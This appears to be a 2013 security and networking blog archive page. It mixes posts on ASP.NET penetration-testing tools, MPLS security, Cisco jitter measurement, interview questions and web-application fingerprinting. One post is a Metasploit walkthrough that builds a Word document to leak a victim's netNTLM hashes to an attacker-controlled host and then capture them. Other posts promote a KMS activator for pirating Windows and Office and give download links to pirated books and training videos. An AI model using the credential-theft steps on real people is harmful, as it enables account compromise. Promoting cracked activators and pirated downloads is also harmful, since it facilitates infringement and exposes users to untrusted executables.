Sunday, March 24, 2013

ASP.NET web-application Testing

Lens is an open-source ethical hacking tool specialized to penetration testing of ASP.NET web applications. Lens is written in WPF 4 and its internal modular architecture allows us to easily add new tests to the system.

You can Download source code from following website.

http://ethicalhackingaspnet.codeplex.com/releases/view/52623

Currently the following tests are available:
(1)Viewstate eavesdroping & information disclosure

(2)Session Fixation

(3)Oracle Padding



ASafaWeb:- 


Automated Security Analyser for ASP.NET Websites . ASafaWeb simply makes HTTP requests to the site and looks for responses which suggest there might be configuration issues.


Wednesday, March 20, 2013

Is MPLS Network Really Secure? MPLS truth revealed against security.

Is MPLS Network Really Secure? MPLS truth revealed against security.

There is a common misconception that MPLS provides some level of security.

The truth is that MPLS offers-

• No protection against misconfiguration -
Human and machine errors as well as OS bugs can result in MPLS traffic being misrouted.

• No protection from attacks within the core - MPLS is vulnerable to all the traditional WAN attack vectors.

• No protection or detection of sniffing/snooping - It is impossible to detect if someone is siphoning or replicating data - there is no “alarm” that goes off if data is being stolen.

• No Data Security - The data is left in the clear and can be accessed, replicated, or used by anyone who gains access to it.


The illustration above shows the components of an MPLS header. Note the absence of any security measures within the header itself.

• The Label Value provides forwarding information used by the routers.
• Traffic Class (TC) bits are used to provide services such traffic prioritization.
• The Stacking bit (S) allows multiple labels to be used.
• TTL is a “time to live” marker to allow packets to expire.

None of these mechanisms provide security.


Also note that the original IP packet is unchanged, which means with MPLS- your data traverses a shared network in the clear.

Hackers and Data Thieves know better!

There are papers and video tutorials readily available on the Internet that provide a “cook book” approach to sniffing and redirecting MPLS traffic. Here’s what Black Hat had to say about MPLS security claims:

Providers say: Traffic streams are kept separate.
Hackers know: The mechanism used to separate traffic can also be used to identify targets of interest!

Providers say: There are controls around provisioning and management.
Hackers know: Provisioning and management are to data security what traffic lights are to bank robbers - they do not prevent data theft!

Providers say: There are gateways between the Internet and the MPLS network.
Hackers know: Traffic is not accidentally leaking out to the Internet, it is being stolen right off the MPLS backbone!

Providers say: They use Netflow/J-Flow to identify ”malicious activity”.
Hackers know: Post-event notification is not a substitute for prevention!

Why You Need to Measure Delay, Jitter and Packet Loss on Data Networks


Why You Need to Measure Delay, Jitter and Packet Loss on Data Networks

With the emergence of new applications such as voice and video on data networks, it is becoming increasingly important for network managers to accurately predict the impact of these new applications on the network. Not long ago, you could allocate bandwidth to applications and allow them to adapt to the bursty nature of traffic flows. Unfortunately, that’s no longer true because today applications such as voice and video are more susceptible to changes in the transmission characteristics of data networks. Therefore, network managers must be completely aware of network characteristics such as delay, jitter, and packet loss, and how these characteristics affect applications.

Why You Need to Measure Delay, Jitter and Packet Loss

To meet today’s business priorities and ensure user satisfaction and usage, IT groups and service providers are moving toward availability and performance commitments by IP application service levels or IP service-level agreements (SLAs).

Prior to deploying an IP service, network managers must first determine how well the network is working, second, deploy the service, such as voice over IP (VoIP), and finally, verify that the service levels are working correctly—which is required to optimize the service deployment. IP SLAs can help meet life-cycle requirements for managing IP services. To ensure the successful implementation of VoIP applications, you first need to understand current traffic characteristics of the network. Measuring jitter, delay, and packet loss and verifying classes of
service (CoS)
before deployment of new applications can aid in the correct redesign and configuration of traffic prioritization and buffering parameters in data network equipment.

This article discusses methods for measuring delay, jitter, and packet loss on data networks using features in the Cisco IOS® Software and Cisco routers.

Delay is the time it takes voice to travel from one point to another in the network. You can measure delay in one direction or round trip. One-way delay calculations require added infrastructure such as Network Time Protocol (NTP) and clock synchronization and reference clocks. NTP is deployed to synchronize router clocks and also when global positioning system (GPS) or another trusted reference time is needed in the network. Accuracy of clocks and clock drift affect the accuracy of one-way delay measurements. VoIP can typically tolerate delays of up to approximately 150 ms one way before the quality of a call is unacceptable to most users.

Jitter is the variation in delay over time from point to point. If the delay of transmissions varies too widely in a VoIP call, the call quality is greatly degraded. The
amount of jitter that is tolerable on the network is affected by the depth of jitter buffer on the network equipment in the voice path. When more jitter buffer is available, the network is more able to reduce the effects of the jitter for the benefit of users, but a buffer that is too big increases the overall gap between two packets. One-way jitter measurement is possible and does not require clock synchronization between the measurement routers.


Packet loss severely degrades voice applications and occurs when packets along the data path are lost. Measuring Network Performance Key capabilities in the Cisco IOS Software can help
you determine baseline values for VoIP application performance on the data network. The ability to gather data in real time and on demand makes it feasible for IT groups and service providers to create or verify SLAs for IP applications; baseline values can then be used to substantiate an IP SLA for VoIP.

Cisco IOS Service Assurance Agent (SAA) technology is a component of an IP SLA solution and the Round Trip Time Monitor (RTTMON) MIB, which enable the testing and collection of delay, jitter, and packet loss measurement statistics. Active monitoring with traffic generation is used for edge-to-edge measurements in the network to monitor the network
performance. You can use the CiscoWorks Internetwork Performance Monitor (IPM) network management

Is Your Network Ready for Voice?

Measuring Delay, Jitter, and Packet Loss for Voice-Enabled Data Networks Your success or failure in deploying new voice technologies will depend greatly on your ability to understand the traffic characteristics of the network and then applying your knowledge to engineer the appropriate network configurations to control those characteristics.

TECH TIPS & TRAINING

Application or the IOS command-line interface (CLI) to configure and retrieve data from the RTTMON MIB, or choose from a wide selection of Cisco ecosystem partners and public domain software to configure and retrieve the data. In addition, the CiscoWorks IPM features are now also available in the WAN Performance Utility (WPU) module of CiscoWorks IP Telephony Environment Monitor (ITEM) network management software.

Deploying Delay/Jitter Agent Routers

You can measure delay, jitter, and packet loss by deploying almost any Cisco IOS device, from a
Cisco 800 Series Router on up. Two deployment scenarios are possible: You can either purchase dedicated routers for SLA measurements or use current routers within the network. Place the routers in a campus network along with hosts to provide statistics for end-to-end connections.
It is not practical to measure every possible voice path in the network, so place the dedicated routers in typical host locations to provide a statistical sampling of typical voice paths.
In the case of VoIP deployments using traditional phones connected to Cisco routers using FXS station ports, the router to which the phones are connected also serves as the delay/jitter measurement device. Once deployed, the operation collects statistics and populates Simple Network Management Protocol (SNMP) MIB tables in the probe router. You can then access the data either through the CiscoWorks IPM, or through simple SNMP polling tools and other third-party applications. Additionally, after baseline values have been established, you can configure operations to send alerts to a network management system (NMS) station if thresholds
for delay, jitter, and packet loss are exceeded.

Simulating a Voice Call

One of the strengths of using Cisco IOS SAA as the testing mechanism is that you can simulate a voice call. In Cisco IOS Software Release 12.3(4)T and later, you can configure the VoIP codec directly in the CLI and simulate a voice call. This release also includes voice quality estimates, Mean Opinion Scores (MOS), and Planning Impairment Factor (PIF) scores. Earlier versions of the Cisco IOS Software enable you to estimate a VoIP codec using the correct packet size, spacing, and interval for the measurement data and enter the appropriate parameters.

The CoS can be set on data or VoIP tests, which allows you to verify how well QoS is working in the network. Examples of how to simulate a voice call are shown below.

With Cisco IOS Software Release 12.3(4)T or later, you can use the VoIP jitter operation to simulate a test call:

rtr 1
type jitter dest-ipaddr 10.1.1.2 dest-port 14384 codec g711alaw
rtr schedule 1 start-time now

With earlier IOS releases before 12.3(4)T you can use the rtp/udp even port numbers in the range of 16384 to 32766. The user then approximates 64 kbit/s, and the packet size is 200 bytes {(160 bytes of payload + 40 bytes for IP/UDP/RTP (uncompressed) }. You can simulate that type of traffic by setting up the jitter operation as shown below.
The jitter operation accomplishes the following:
  • Send the request to rtp/udp port number 14384
  • Send 172 byte packets (160 payload + 12 byte RTP header size) + 28 bytes (IP + UDP)
  • Send 3000 packets for each frequency cycle
  • Send every packet 20 milliseconds apart for a duration of 60 seconds and sleep 10 seconds before starting the next frequency cycle
The parameters in the example above give you 64 kbit/s for the 60-second test period.

((3000 datagrams * 160 bytes per datagram)/ 60 seconds))* 8 bits per byte = 64 kbit/s

The configuration on the router would look like this:
rtr 1
type jitter dest-ipaddr 10.1.1.2 dest-port 14384 numpackets 3000 request-data-size 172**
frequency 70
rtr schedule 1 start-time now

Note that IP+UDP is not considered in the requestdata-size, because the router internally adds them to the size automatically.

Delay/Jitter Probe Deployment Example

The two routers below would simulate voice calls of 64 kbit/s every 60 seconds and record delay, jitter, and packet loss in both directions. Note that the delay calculations are round-trip times and must be divided by two to arrive at the amount of one-way delay unless NTP is implemented for one-way delay measurements.

router1# rtr responder rtr 1 type jitter dest-ipaddr 10.1.2.1 dest-port 14384 codec g711alaw
tos 160 frequency 60 rtr schedule 1 start-time now

router2# rtr responder rtr 1 type jitter dest-ipaddr 10.1.1.1 dest-port 14385 codec g711alaw
tos 160 frequency 60 rtr schedule 1 start-time now

Command-Line Data Examples

To view the results you can use the IOS show command at the command line for the jitter operation. Additionally, you can use the command-line data for real-time monitoring and troubleshooting of delay, jitter, and packet loss. For an example of the CLI output, refer to cisco.com/packet/163_4b1.

Monitoring Thresholds

You can use the CLI, CiscoWorks IPM, or the WPU in CiscoWorks ITEM to configure features and monitor data. You can use this data to manage IP SLAs that have been created for VoIP. After you have determined baseline values, you can reconfigure the jitter operations to monitor the network. When predetermined delay and jitter service-level thresholds are reached or exceeded, NMS stations will be alerted.

After you have established baseline values through the initial data collection, you can monitor the delay, jitter, and packet loss levels in the network with the embedded alarm features of Cisco IOS SAA.

The Cisco IOS SAA threshold command sets the rising threshold (hysteresis) that generates a reaction event and stores history information for the operation. Cisco IOS SAA can measure and create thresholds for round-trip time delay, average jitter, connectivity loss, one-way packet loss, jitter, and delay.

Sample Service Assurance Threshold Configuration


router1# rtr 100 rtr reaction-configuration 100 threshold-falling 50 threshold-type immediate action trapOnly

Understanding the traffic characteristics of the network before you deploy new advanced applications is the key to successful implementations. Delay, jitter, and packet loss greatly affect VoIP applications. Your success or failure in deploying new voice technologies will depend greatly on your ability to understand the traffic characteristics of the network and then applying your knowledge to engineer the appropriate network configurations to control
those characteristics.

---Do you want to share you views?? Just leave a comment here. you can also drop an email on mail@amarjit.info

Tuesday, March 19, 2013

Interview questions for fresher network engineer: Tips and Tricks for CCNA, CCNP, OSPF, BGP, MPLS-VPN | Ask all your queries online absolutely free

This is guest post from Mr.Shivlu Jain. He is running a blog related to MPLS VPN

If you have any concerns or any question related with any protocol or networking technology, you can visit his blog and just leave a comment. All you questions will be answered by professionals absolutely free.


Market is on boom and almost every company has opened its door for new positions and everyone is looking for change to grab new positions with new challenges. So make sure that you have prepared the answers for the below questions before your interview. The questions are generic and will make very good impression on interviewer if you answer them in organised and structured manner. The depicted IGP interview questions are for CCNA and CCNP engineers.

1. Difference between RIPv1 and RIPv2?
2. How many number of routes carried by RIP packet?
3. Is OSPF link state or distance vector or path vector protocol?
4. What is the difference between OSPF and IS-IS and which one is preferred?
5. Can we use BGP instead of any IGP?
6. How many network types available in OSPF?
8. LSA 3 and LSA 4 are generated by which router?
9. When to use Stub and Not So Stubby Area?
10. How to get the external routes without making area Not So Stubby?
11. What is the different type of route summarization available in OSPF?
12. What is the requirement of doing summarization?
13. A major network is advertised as summary in one area and few of the routes from that network is configured in another area. What will happen in that case?
14. If any of the OSPF area is not stabilized, does it impact another area?
16. External routes are available in OSPF database but not installing in routing table?
17. If loopback is not configured, what will be the router-id selected by OSPF process?
18. Can we run multiple OSPF process in single router and what is the advantage of using it?
19. What are timers of OSPF?
20. Multicast address of used by OSPF.
21. OSPF works on which layer?
22. What is backbone area in OSPF?
23. Can we use OSPF without backbone area?
24. Is it required that OSPF router-id must reachable in IGP cloud?
25. After configuring new router-id, automatically it will be used or do we need to use some type of command to get it operational.
26. Why the secondary ip address of interface is not advertising in IGP cloud?
27. OSPF neighbourship is not coming up. Please tell the various steps to troubleshoot it.
28. One side MTU is 1500 and another side MTU is 1600. Does it affect neighbourship?
29. Provide process of DR and BDR election.
30. If DR is down and no BDR is configured what will happen?
31. What is the difference between a neighbor and adjacent neighbor?
32. My OSPF neighbourship is showing 2-way, what does it mean?
33. Define different type of OSPF neighbor states?

For more CLICK HERE

Web-application Fingerprinting



Methods of Web Application Finger Printing

Historically Identification of Open Source applications have been easier as the behavior pattern and all the source codes are publically open. In the early days web application identification was as simple as looking in the footer of the Page of text like “Powered by <XYZ>”. However as more and more Server admin became aware of this simple stuff so is the Pen Testers approach became more complex towards identification of web application running on remote machine.

HTML Data Inspection

This is the simplest method in which manual approach is to open the site on browser and look at its source code, similarly on automated manner your tool will connect to site, download the page and then will run some basic regular expression patterns which can give you the results in yes or no. Basically what we are looking for is unique pattern specific to web software. Examples of such patterns are

1) Wordpress
Meta Tag Folder Names
Web-application-Fingerprinting-1

Folder Names in Link section
Web-application-Fingerprinting-2

Ever green notice at the bottom
Web-application-Fingerprinting-3

2) OWA
URL pattern
http://<site_name>/OWA/

3) Joomla
URL pattern: http://<site_name>/component/
Web-application-Fingerprinting-4



4) SharePoint Portal
URL Pattern: /_layouts/* And similarly for majority of applications we can create regular expression rules to identify them.

These regular expression’s combined together as a monolithic tool to identify all in one go or as a pluggable architecture for creating one pattern file for each type and work on it. Example of tools using this technique includes browser plugin’s like Wapplyzer and web technology finder and similar tools.

File and Folder Presence (HTTP response codes)

This approach doesn’t download the page however it starts looking for obvious trails of an application by directly hitting the URL and in course identifying found and not found application list. In starting days of internet this was easy, just download headers and see if it’s 200 OK or 404 not found and you are done.
Web-application-Fingerprinting-5

Web-application-Fingerprinting-6

However in current scenario, people have been putting up custom 404 Pages and are actually sending 200 OK in case the page is not found. This complicates the efforts and hence the new approach is as follows.

1) Download default page 200 OK.
2) Download a file which is guaranteed to be non-existing then mark it as a template for 404 and then proceed with detection logic.

Based on this assumption and knowledge this kind of tools start looking for known files and folders on a website and try to determine the exact application name and version. Example of such scenario would be wp-login.php => wordpress /owa/ => Microsoft outlook web frontend.

Checksum Based identification

This is relatively a newer approach considered by far as most accurate approach in terms on application and specific version identification. This Technique basically works on below pattern.

1) Create checksum local file and store in DB
2) Download static file from remote server
3) Create checksum
4) Compare with checksum stored in db and identified

Disadvantages of Current automated Solutions

1) First and foremost these tools get noisy especially in auto detection modes.
2) Large numbers of 404’s can immediately trigger alarms across the places.
3) Secondly they generally rely on the URL pattern we gave and fail to look beyond that. However it might be the case that site main link has reference links to its blog which might not be updated and could open gates for us.
4) They lack the humanly fuzziness.

Friday, March 8, 2013

Microsoft Word UNC Path Injector

This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007 and 2010 as of January 2013. In order to get the hashes the auxiliary/server/capture/smb module can be used.

First Hack the Victim PC Using Metaspolit (click here)

msfconsole

use auxiliary/docx/word_unc_injector

msf exploit (word_unc_injector)>set lhost 192.168.1.2 (IP of Local Host)

msf exploit (word_unc_injector)>exploit

Now we successfully generate the malicious docx File, it will stored on your local computer

/root/.msf4/local/msf.docx

Now use ‘upload ‘command to upload the msf.docx in victim pc using

Upload /root/.msf4/local/msf.docx.

Now use auxiliary/server/capture/smb

msf exploit (smb)>run

When victim open your msf.doc files you will get the password hash after get the victim password hashes, you can try to connect to another victim use the same password

Wednesday, March 6, 2013

Windown 8 Key Activator Loader Patch 2013 (+ Pro Activator v1.0 Final)



http://i52.fastpic.ru/big/2013/0306/e8/a4803bcf4336aba6d568f1bc4bfb31e8.jpg
Win 8 Key Activator Loader Patch 2013 (+ Pro Activator v1.0 Final) | 4.69 Mb

The 100% Working Solution is Here. Windows 8 ActivatorReleased. Activate Your Windows 8 All Version.

Windows 8 Activator and Office 2013 Activator: KMSEmulator v1.0 Automatic | 31.4 Mb



http://i52.fastpic.ru/big/2013/0306/a8/6f705d6d76de5bb8a1ff2e3e609582a8.jpg
KMSEmulator v1.0 Automatic | 31.4 Mb

KMSEmulator - a new activator for Windows 8 and Office 2013. KMSEmulator is unique, as all activation is automatic and is only to run the activator, no further action is required.
After starting the KMSEmulator automatically activates all products installed Microsoft, whether Windows 8 or Office 2013. If both produksta not activated, KMSEmulator activates and Windows 8, and immediately Office 2013. In addition to using KMSEmulator can activate Windows Vista / Windows 7 and Office 2010.

Features:
Universal (activates: Vista/7/8 Pro / Enter / N and Office 2010/2013 Retail / VL)
Does not require user intervention (enough to run the activator).
Simultaneous activation immediately and Windows, and Office.

With KMSEmulator can:
Activate Windows 8 Enterprise
Activate Windows 8 Professional
Activate Microsoft Office 2013
Activate Microsoft Office Visio 2013
Activate Microsoft Office Project 2013
Activate Microsoft Office 2010
Activate Microsoft Office Visio 2010
Activate Microsoft Office Project 2010
Activate Windows 7 Enterprise
Activate Windows 7 Professional
Activate Windows Vista Enterprise
Activate Windows Vista Professional

Instructions:
1. KMSEmulator run as administrator [Vista/7/8 Pro / Enter / N + Office2013 RT / VL]
2. Wait for the end of operations (extraction, activation).
3. That\\\'s it! Done.

for each run should take fresh images from the archive (otherwise after one run the server daemon activation will not start)

Activation for 180 days, and it can push for some time.

If you want to activate one product use arguments: noWin, / no2010 and / no2013 arguments KMSELDI.exe and edit Manual_Silent.cmd

KMS will not activate:
Vista Starter / Homebasic / Homepremium / Ultimate
7 Starter / Homebasic / Homepremium / Ultimate
8 core / ProWMC

N and E versions use the same methods, and will not be activated.
Please note that the Pre-Release-version of Office or Windows will never be activated.
TriggerKMS-it is like a planner, when only 30 days before the end of the activation, he pours it back up to 180 days. Instead of 30, you can specify its value)

[Spoiler = If you would have problems:]
To view the log file, check:
% Temp% KMSEmulator.log

- Requirements:
- NET 4.0 or Windows 8.
- Activates Windows Vista/7/8 Pro / Enter / N and Office 2010/2013 Retail / VL.

1. Double-click on KMSEmulator
2. Wait for the files to decompress.
3. Wait for activation process to finish.
4. Done.

To permanent activation:
1. Extract or copy all files in a permanent folder
2. Go to the permanent folder and run the script: RunTrigger.cmd
3. Every five months it will automatic reactivate.

Change Log:
- Fixed reported bugs with Retail Editions and Skipped Windows.
Date: 2013 Platform: Windows Vista/7/8 Interface: English
Download:

Uploaded:
http://uploaded.net/file/aa9r0170/w226m.KMSEmulator.v1.0.Automatic.rar

Bitshare:
http://bitshare.com/files/2bi4vt1t/w226m.KMSEmulator.v1.0.Automatic.rar.html

Ryushare:
http://ryushare.com/o9l8r4ed04ft/w226m.KMSEmulator.v1.0.Automatic.rar

Tuesday, March 5, 2013

Dreaming in Code - Two Dozen Programmers, Three Years, 4,732 Bugs, and One Quest for Transcendent Software



Dreaming in Code - Two Dozen Programmers, Three Years, 4,732 Bugs, and One Quest for Transcendent Software (Audiobook)

Dreaming in Code - Two Dozen Programmers, Three Years, 4,732 Bugs, and One Quest for Transcendent Software (Audiobook)

2012 | 12 hours and 2 mins | ISBN: n/a , ASIN: B00AQ5DOCA | MP3 80 kbps | 434 MB

Their story takes us through a maze of dead ends and exhilarating breakthroughs as they and their colleagues wrestle not only with the abstraction of code but with the unpredictability of human behavior, especially their own. Along the way, we encounter black holes, turtles, snakes, dragons, axe-sharpening, and yak-shaving - and take a guided tour through the theories and methods, both brilliant and misguided, that litter the history of software development, from the famous "mythical man-month" to Extreme Programming.

Not just for technophiles but for anyone captivated by the drama of invention, Dreaming in Code offers a window into both the information age and the workings of the human mind.
http://rapidgator.net/file/82928141/DkJ5EO.Dreaming.in.Code.part1.rar
http://rapidgator.net/file/82928139/DkJ5EO.Dreaming.in.Code.part2.rar
http://rapidgator.net/file/82928148/DkJ5EO.Dreaming.in.Code.part3.rar
http://rapidgator.net/file/82928159/DkJ5EO.Dreaming.in.Code.part4.rar
http://rapidgator.net/file/82928085/DkJ5EO.Dreaming.in.Code.part5.rar

Mirror:
http://www.secureupload.eu/8fz0jtwd6gbt/DkJ5EO.Dreaming.in.Code.part1.rar.html
http://www.secureupload.eu/tiy0lo65btwu/DkJ5EO.Dreaming.in.Code.part2.rar.html
http://www.secureupload.eu/awjn6xo9k1s8/DkJ5EO.Dreaming.in.Code.part3.rar.html
http://www.secureupload.eu/2lcbokk2ml4k/DkJ5EO.Dreaming.in.Code.part4.rar.html
http://www.secureupload.eu/yir4ga6wm1yj/DkJ5EO.Dreaming.in.Code.part5.rar.html

Advance Your Drupal Skills: Drupal 7 Cookbook Free Download



Drupal 7 Cookbook (TRUE PDF)
Drupal 7 Cookbook (TRUE PDF)
English | ISBN: 1849517967 | 2012 | 324 pages | PDF | 4 MB

Over 70 recipes that will advance your Drupal skills from novice to pro


OverviewInstall, set up, and manage a Drupal site and discover how to get the most out of creating and displaying content
Become familiar with creating new content types and use them to create and publish content using Views, Blocks, and Panels


Learn how to work with images, documents, and video and how to integrate them with Facebook, Twitter, and Add this

Download

http://rapidgator.net/file/83010210/Drupal_7_Cookbook.pdf.html
http://www.secureupload.eu/epsbggdz6zge/Drupal_7_Cookbook.pdf

Professional Free Backup and Restore Software



AOMEI Backupper v1.1 Portable
AOMEI Backupper v1.1 Portable | 58.4 Mb

AOMEI Backuper, a professional free backup and restore software that is easy to use for most common users. It supports system backup, disk backup, partition backup, system restore, disk, partition restore and disk partition clone and etc. With the friendly interface (or GUI), users could easily master some professional tech of backup and restore.
From technology``s view, AOMEI Backuper provides all the basic tech of partition backup and restore, like other backup software. The unique of this software is already supports VSS, a technology from Microsoft that enables data backup process does not interfere running applications. So it is very efficient because backup data can still be made when you``re working.

What``s more, this latest free backup tool could support not only PC OS (such as Windows 8, Windows 7 etc) but also support server OS (such as Windows Server 2003, 2008, 2012 etc). Therefore, no matter you are a Servers administrator or a common home users, this software could help you backup and restore data in an easy and safe way.

Storage Devices: Supports all storage devices recognized by Windows, such as IDE, SATA, SCSI, SSD, USB external disks, Hardware RAID and so on. Moreover, supports MBR and GPT style, and fully support capacities greater than 2TB.

What``s new in this version:
-Windows PE bootable disc enhancements, bug fixes and and Supports Linux bootable disc.

Operating System on CD/DVD/USB Disk: Active Boot Disk Suite 7.1.0 Portable



Active Boot Disk Suite 7.1.0 Portable

Active Boot Disk Suite 7.1.0 Portable | 194.9 MB

Active@ Boot Disk is a complete and functioning computer operating system on CD/DVD/USB disk. Active@ Boot Disk does not modify the operating system already installed on a computer``s hard drive. It includes many tools to boot up a computer and fix most startup, PC configuration, and system management problems.


Key Features:
- Dual-boot functionality (DOS + Windows)
- New Boot Disk Creator interface plus additional features
- Disk Defragmenter for files optimization
- New activation process does not require reinstallation
- File management — browse directories, search, copy and move files and folders
- Data CD/DVD burning for data backup and recovery purposes
- Additional driver loading on-the-fly, or from pre-configured directories
- Full access to non-bootable PC
- Network access via TCP/IP, network configurator is included

Monday, March 4, 2013

Ankit Fadia Ethical Hacking - Video Tutorial Pack: Certified Ethical Hacker 6.0 Download Free


Ankit Fadia Ethical Hacking - Video Tutorial Pack: Certified Ethical Hacker 6.0 Download Free

http://i52.fastpic.ru/big/2013/0217/2c/f2b7006369c47e66597dc5e0dac88f2c.jpg

Ethical Hacking - [Video Tutorial Pack] | 2.7 GB 
Ethical Hacking & Penetration | VTC
Intro To Computer Forensics | VTC
Ankit Fadia Certified Ethical Hacker | Ankit Fadia
Linux Hacking | Various

Download:

Free Download Ethical Haking Video Training Tutorials: Infosec Advanced Ethical Hacking 2013 Training

Free Download Ethical Haking Video Training Tutorials: Infosec Advanced Ethical Hacking 2013 Training


Infosec Advanced Ethical Hacking 2013 Training

Infosec Advanced Ethical Hacking
Flash Video | MP4 / AVC, ~819 kb/s | 720x480 | Duration: 04:55:12 | English: AAC, 52 kb/s (2 ch) | 1.23 GB
Genre: Security

Modern networks and systems are fully patched, hardened from attack, and armored to the hilt with expensive security gear - but the bad guys still get in on a daily basis! How do they do this? Why is there a news release every day of another Fortune 500 company hacked, more government secrets lost to the adversary?

InfoSec Institute̢۪s Advanced Ethical Hacking Boot Camp aims to train you on how to successfully attack fully patched and hardened systems, how to circumvent common security controls, and how to get to confidential data. You take this knowledge back to your organization and can then formulate a way to defend against these sophisticated attacks.
  • In this hands-on training class, you will learn how to:
  • Leverage 0day (private unreleased exploits) attacks as part of the â€Å“Advanced Persistent Threat”
  • Run sophisticated attacks against client side applications
  • Use fuzzers and dynamic analysis to attack custom and COTS apps
  • Reverse engineer binaries to find new vulnerabilities never discovered before
  • Exploit secured web applications
  • Run chained exploits to pivot from multiple exploitable systems
  • Attack and defeat VPNs, IDS/IPS and other security technologies
Screenshot

Infosec Advanced Ethical Hacking 2013 Training


Uploaded Links

http://uploaded.net/file/1c3r1m42/In_Ins_Adv__E.part1.rar
http://uploaded.net/file/rg8nkn9q/In_Ins_Adv__E.part2.rar
http://uploaded.net/file/htxlfx48/In_Ins_Adv__E.part3.rar
http://uploaded.net/file/lb5eh799/In_Ins_Adv__E.part4.rar

Lumfile Links


Ryushare Links

Download Video: Computer Hacking and Forensic Investigator Training V.4



Computer Hacking and Forensic Investigator Training V.4
Computer Hacking and Forensic Investigator Training V.4
Flash Video | Sorenson Spark, ~786 kb/s | 800x600 | Duration: N/A | English: MP3, 128 kb/s (1 ch) | 12.1 GB
Genre: Development / Programming / Hacking / Security

Computer hacking forensic investigation is the process of detecting hacking attacks and properly extracting evidence to report the crime and conduct audits to prevent future attacks. Computer forensics is simply the application of computer investigation and analysis techniques in the interests of determining potential legal evidence. Evidence might be sought in a wide range of computer crime or misuse, including but not limited to theft of trade secrets, theft of or destruction of intellectual property, and fraud. CHFI investigators can draw on an array of methods for discovering data that resides in a computer system, or recovering deleted, encrypted, or damaged file information. This course will prepare you to pass the EC0 312-49 exam and achieve Computer Hacking Forensics Investigator (CHFI) certification.

Screenshots
Computer Hacking and Forensic Investigator Training V.4
Computer Hacking and Forensic Investigator Training V.4
Computer Hacking and Forensic Investigator Training V.4

Download links (3% recovery):
Download(Rapidgator)
http://rapidgator.net/file/81857915/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD1.part6.rar.html
http://rapidgator.net/file/81857918/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD1.part1.rar.html
http://rapidgator.net/file/81858200/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD1.part2.rar.html
http://rapidgator.net/file/81858206/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD1.part5.rar.html
http://rapidgator.net/file/81858229/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD1.part3.rar.html
http://rapidgator.net/file/81858251/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD1.part4.rar.html
http://rapidgator.net/file/81858288/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD2.part1.rar.html
http://rapidgator.net/file/81858460/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD2.part4.rar.html
http://rapidgator.net/file/81858569/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD2.part2.rar.html
http://rapidgator.net/file/81858807/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD2.part3.rar.html
http://rapidgator.net/file/81858898/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD3.part3.rar.html
http://rapidgator.net/file/81859053/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD3.part1.rar.html
http://rapidgator.net/file/81859084/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD3.part2.rar.html
http://rapidgator.net/file/81859175/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD4.part3.rar.html
http://rapidgator.net/file/81859268/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD5.part2.rar.html
http://rapidgator.net/file/81859285/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD4.part1.rar.html
http://rapidgator.net/file/81859469/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD4.part2.rar.html
http://rapidgator.net/file/81859478/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD6.part2.rar.html
http://rapidgator.net/file/81859577/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD5.part1.rar.html
http://rapidgator.net/file/81859668/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD6.part1.rar.html

Download(Ryushare)

http://ryushare.com/49c290b4492a/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD1.part1.rar
http://ryushare.com/4d65e347e7b0/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD1.part2.rar
http://ryushare.com/4aab65596466/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD1.part3.rar
http://ryushare.com/4b9439fe6e7a/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD1.part4.rar
http://ryushare.com/4aab6559646a/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD1.part5.rar
http://ryushare.com/4b9439fe6e7b/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD1.part6.rar
http://ryushare.com/4d65e347e7b5/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD2.part1.rar
http://ryushare.com/4aab6559646c/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD2.part2.rar
http://ryushare.com/4c7d0ea323aa/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD2.part3.rar
http://ryushare.com/4aab6559646d/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD2.part4.rar
http://ryushare.com/4c7d0ea323ac/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD3.part1.rar
http://ryushare.com/4aab6559646f/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD3.part2.rar
http://ryushare.com/4b9439fe6e80/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD3.part3.rar
http://ryushare.com/4aab65596472/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD4.part1.rar
http://ryushare.com/4b9439fe6e82/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD4.part2.rar
http://ryushare.com/4c7d0ea323ad/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD4.part3.rar
http://ryushare.com/4aab65596475/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD5.part1.rar
http://ryushare.com/4b9439fe6e83/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD5.part2.rar
http://ryushare.com/4c7d0ea323af/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD6.part1.rar
http://ryushare.com/4d65e347e7bf/kdTRFEP_-_EC-C_C_H_F_In_v4_DVD6.part2.rar

Ninja Hacking: Unconventional Penetration Testing Tactics and Techniques


Ninja Hacking: Unconventional Penetration Testing Tactics and Techniques (TRUE PDF)
Ninja Hacking: Unconventional Penetration Testing Tactics and Techniques (TRUE PDF)
